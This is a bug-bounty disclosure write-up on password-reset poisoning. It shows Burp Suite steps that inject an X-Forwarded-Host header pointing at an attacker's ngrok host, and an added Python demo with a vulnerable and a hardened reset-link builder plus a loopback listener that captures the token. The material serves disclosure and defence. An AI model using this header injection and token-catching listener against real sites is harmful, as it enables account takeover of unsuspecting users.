Account Takeover Through Password Reset Poisoning

Tools used

  1. Burp Suite
  2. ngrok (to expose an attacker-controlled server)

Steps to reproduce

  1. Go to https://redacted.com/users/forgot_password and enter a username to request a password-reset link.
  2. Capture this request in Burp Suite and add the header X-Forwarded-Host: bing.com. If the application builds the reset link from this header, the link in the reset e-mail now points to bing.com instead of redacted.com.
Screenshot: the captured request with the added X-Forwarded-Host header
Attack scenario

  1. The attacker starts a server exposed through ngrok; this is the attacker's server that will receive the victim's reset token.
  2. The attacker goes to https://redacted.com/users/forgot_password, enters the victim's username, and captures the request in Burp Suite.
  3. In the captured request the attacker adds X-Forwarded-Host: ngrok.io, where ngrok.io stands for the hostname of the attacker's ngrok tunnel. The reset e-mail sent to the victim now carries a link to the attacker's server; when the victim clicks it, the reset token is delivered to the attacker, who can use it to set a new password and take over the account.
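The chain above, reduced to code so the root cause and the fix are both visible. This is an added example, not code from the original post or from the affected site: the hostnames, the /users/reset_password path, the token parameter name and the loopback listener that stands in for the ngrok tunnel are all constructed for the demo. The vulnerable builder takes the link's origin from X-Forwarded-Host (falling back to Host); the hardened builder takes it from configuration and rejects unexpected Host values. The simulation runs the whole sequence on 127.0.0.1: forged header, poisoned link, victim's click, token captured by the attacker's server.

```python
"""Password reset poisoning via X-Forwarded-Host, simulated with the standard library.

Added example, not code from the original post or the affected site. The hostnames,
the /users/reset_password path, the 'token' parameter and the victim's click are all
constructed for this demo.
"""
import secrets
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed site configuration: the canonical origin is fixed in config, never read from a request.
CANONICAL_HOST = "redacted.com"
ALLOWED_HOSTS = {"redacted.com", "www.redacted.com"}


def build_reset_link_vulnerable(headers, token, scheme="https"):
    """The bug: the app trusts X-Forwarded-Host (falling back to Host) when building
    the absolute URL it e-mails to the user, so whoever sends the forgot-password
    request for the victim's username decides where the token is sent.
    (Real frameworks match header names case-insensitively; a plain dict is used here.)"""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"{scheme}://{host}/users/reset_password?{urlencode({'token': token})}"


def build_reset_link_fixed(headers, token, scheme="https"):
    """Hardened: the link origin comes from configuration. X-Forwarded-Host is ignored
    entirely, and Host is checked against an allowlist so an unexpected value fails loudly."""
    host = headers.get("Host", "")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{scheme}://{CANONICAL_HOST}/users/reset_password?{urlencode({'token': token})}"


def fixed_rejects_host(headers, token="t"):
    """True if the hardened builder refuses to build a link for these headers."""
    try:
        build_reset_link_fixed(headers, token)
    except ValueError:
        return True
    return False


class TokenCatcher(BaseHTTPRequestHandler):
    """The attacker's listener (what sits behind the ngrok tunnel in the write-up):
    it records any reset token that arrives in the query string."""
    captured = []

    def do_GET(self):
        query = parse_qs(urlsplit(self.path).query)
        if "token" in query:
            TokenCatcher.captured.append(query["token"][0])
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # keep the demo quiet
        pass


def simulate_attack():
    """Run the whole chain on loopback: attacker-controlled header -> poisoned link
    -> victim's click delivers the token to the attacker's server."""
    TokenCatcher.captured.clear()
    server = HTTPServer(("127.0.0.1", 0), TokenCatcher)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    attacker_host = f"127.0.0.1:{server.server_port}"  # stands in for the ngrok hostname
    token = secrets.token_urlsafe(16)  # the app's freshly issued reset token

    # The attacker's forged forgot-password request for the victim's account.
    headers = {"Host": CANONICAL_HOST, "X-Forwarded-Host": attacker_host}
    poisoned_link = build_reset_link_vulnerable(headers, token, scheme="http")
    safe_link = build_reset_link_fixed(headers, token)

    # The victim opens the e-mailed link; with the vulnerable builder it hits the attacker.
    urllib.request.urlopen(poisoned_link, timeout=5).read()
    server.shutdown()
    server.server_close()
    return {"token": token, "poisoned_link": poisoned_link,
            "safe_link": safe_link, "captured": list(TokenCatcher.captured)}


if __name__ == "__main__":
    result = simulate_attack()
    print("poisoned link :", result["poisoned_link"])
    print("fixed link    :", result["safe_link"])
    print("attacker got  :", result["captured"])
```

The same defect applies to an attacker-controlled Host header when no reverse proxy normalises it, which is why the hardened builder validates Host rather than merely dropping X-Forwarded-Host. When testing a target, the quick check is the one the write-up performs with bing.com: inject a host you do not control and inspect where the e-mailed link points before pointing it at your own listener.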
Timeline

  1. I reported it to them on 1st August.
  2. They saw the report, steps to reproduce, and PoC (screenshots, videos).
  3. And they rewarded me with a 3-digit $ bounty (between $700 and $1,000).

Vishal Bharad
Penetration Tester, Bug Bounty Hunter, Security Researcher
